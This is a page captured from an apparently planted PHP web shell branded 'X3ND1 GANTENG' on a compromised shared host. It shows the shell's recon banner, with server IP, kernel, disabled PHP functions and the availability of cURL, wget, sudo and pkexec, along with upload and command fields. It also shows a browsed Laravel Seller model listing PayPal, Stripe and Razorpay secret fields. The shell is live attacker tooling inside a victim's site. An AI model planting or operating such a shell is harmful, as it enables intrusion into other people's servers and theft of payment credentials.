X3ND1 GANTENG
Server IP : 108.163.255.210  /  Your IP : 3.142.198.250
Web Server : Apache
System : Linux blossom.urlnameserver.com 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
User :  ( 1172)
PHP Version : 7.2.34
Disable Function : eval,escapeshellarg,proc_close,proc_get_status,proc_nice,proc_open,symlink,system,pcntl_exec,getrusage,chown,chgp,closelog,openlog,syslog,define_syslog_variables,php_ini_loaded_file,getservbyname,getservbyport,posix_getgid,posix_getgrgid,proc_terminate,pfsockopen,apache_child_terminate,posix_mkfifo,posix_setpgid,posix_setuid,hypot,pg_host,pos,posix_access,posix_getcwd,posix_getservbyname,myshellexec,getpid,posix_getsid,posix_isatty,posix_kill,posix_mknod,posix_setgid,posix_setsid,posix_setuid,posix_times,posix_uname,ps_fill,posix_getpwuid,global,ini_restore,zip_open,zip_read,rar_open,bzopen,bzread,bzwrite,apache_get_modules,apache_get_version,phpversionphpinfo,php_ini_scanned_files,get_current_user,disk_total_space,diskfreespace,leak,imap_list,hypo,filedump,safe_mode,getmygid,apache_getenv,apache_setenv,bzread,bzwrite,bzopen,phpini,higlight_file,dos_conv,get_cwd,er_log,cmd,e_name,vdir,get_dir,only_read,ftok,ftpexec,posix_getpwnam,mysql_list_dbs,disk_free_space,session_save_path,confirm_phpdoc_compiled,zip_entry_rea,php_u,psockopen,crack_opendict,crack_getlastmessage,crack_closedict,crack_check,fpassthru,posix_get_last_error,posix_getlogin,posix_getgroups,posix_strerror,posix_getrlimit,posix_getpgrp,posix_getgrnam,pos,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/unilinki/public_html/shop/app/Models/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ BERANDA ]     

Current File : /home/unilinki/public_html/shop/app/Models/Seller.php
<?php

namespace App\Models;

use Illuminate\Database\Eloquent\Model;
use App\User;

/**
 * App\Models\Seller
 *
 * @property int $id
 * @property int $user_id
 * @property int $verification_status
 * @property string|null $verification_info
 * @property int $cash_on_delivery_status
 * @property int $sslcommerz_status
 * @property int|null $stripe_status
 * @property int $paypal_status
 * @property string|null $paypal_client_id
 * @property string|null $paypal_client_secret
 * @property string|null $ssl_store_id
 * @property string|null $ssl_password
 * @property string|null $stripe_key
 * @property string|null $stripe_secret
 * @property int $instamojo_status
 * @property string|null $instamojo_api_key
 * @property string|null $instamojo_token
 * @property int $razorpay_status
 * @property string|null $razorpay_api_key
 * @property string|null $razorpay_secret
 * @property float $admin_to_pay
 * @property \Illuminate\Support\Carbon $created_at
 * @property \Illuminate\Support\Carbon $updated_at
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller newModelQuery()
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller newQuery()
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller query()
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereAdminToPay($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereCashOnDeliveryStatus($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereCreatedAt($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereId($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereInstamojoApiKey($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereInstamojoStatus($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereInstamojoToken($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller wherePaypalClientId($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller wherePaypalClientSecret($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller wherePaypalStatus($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereRazorpayApiKey($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereRazorpaySecret($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereRazorpayStatus($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereSslPassword($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereSslStoreId($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereSslcommerzStatus($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereStripeKey($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereStripeSecret($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereStripeStatus($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereUpdatedAt($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereUserId($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereVerificationInfo($value)
 * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\Seller whereVerificationStatus($value)
 * @mixin \Eloquent
 */
class Seller extends Model
{
    protected $fillable = ['admin_to_pay'];

    public function user()
    {
        return $this->belongsTo(User::class);
    }
}

Anon7 - 2022
SCDN GOK